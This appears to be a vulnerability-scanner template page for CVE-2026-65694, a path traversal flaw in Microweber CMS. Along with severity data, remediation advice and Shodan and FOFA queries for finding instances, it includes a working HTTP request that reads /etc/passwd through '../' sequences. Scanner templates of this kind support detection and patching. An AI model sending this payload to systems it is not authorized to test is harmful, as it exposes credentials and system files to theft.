Microweber CMS <= 2.0.20 - Unauthenticated Arbitrary File Read
CVE-2026-65694
Verified
Description
Microweber CMS <= 2.0.20 contains a path traversal vulnerability caused by failure to normalize path query parameter in static file controller, letting unauthenticated remote attackers read arbitrary files.
Severity
High
CVSS Score
7.5
Exploit Probability
3%
Affected Product
microweber
Published Date
July 30, 2026
Template Author
0x_akoko, abdugafforov-bobur
CVE-2026-65694.yaml
id: CVE-2026-65694
info:
name: Microweber CMS <= 2.0.20 - Unauthenticated Arbitrary File Read
author: 0x_Akoko,abdugafforov-bobur
severity: high
description: |
Microweber CMS <= 2.0.20 contains a path traversal vulnerability caused by failure to normalize path query parameter in static file controller, letting unauthenticated remote attackers read arbitrary files.
impact: |
Unauthenticated attackers can read sensitive files, potentially exposing credentials and system information.
remediation: |
Update to the latest version beyond 2.0.20.
reference:
- https://github.com/abdugafforov-bobur/CVE-2026-65694-PoC
- https://nvd.nist.gov/vuln/detail/CVE-2026-65694
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-65694
epss-score: 0.03394
epss-percentile: 0.88106
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
vendor: microweber
product: microweber
shodan-query: http.html:"microweber"
fofa-query: body="microweber"
tags: cve,cve2026,microweber,lfi
http:
- raw:
- |
GET /userfiles/x?path=../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "root:x:0:0")'
condition: and
# digest: 4b0a0048304602210096c36b249e20c4dc4ddf2157d3c7bffb8994e45f5afdc06cbe1e7e76426d6d59022100bfd5564b2e7db19cc5fbe0f7fd5bdcbee3371304dfebd22626dc64d59d000c0e:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-65694
CWE ID:
cwe-22
Remediation Steps
Update to the latest version beyond 2.0.20.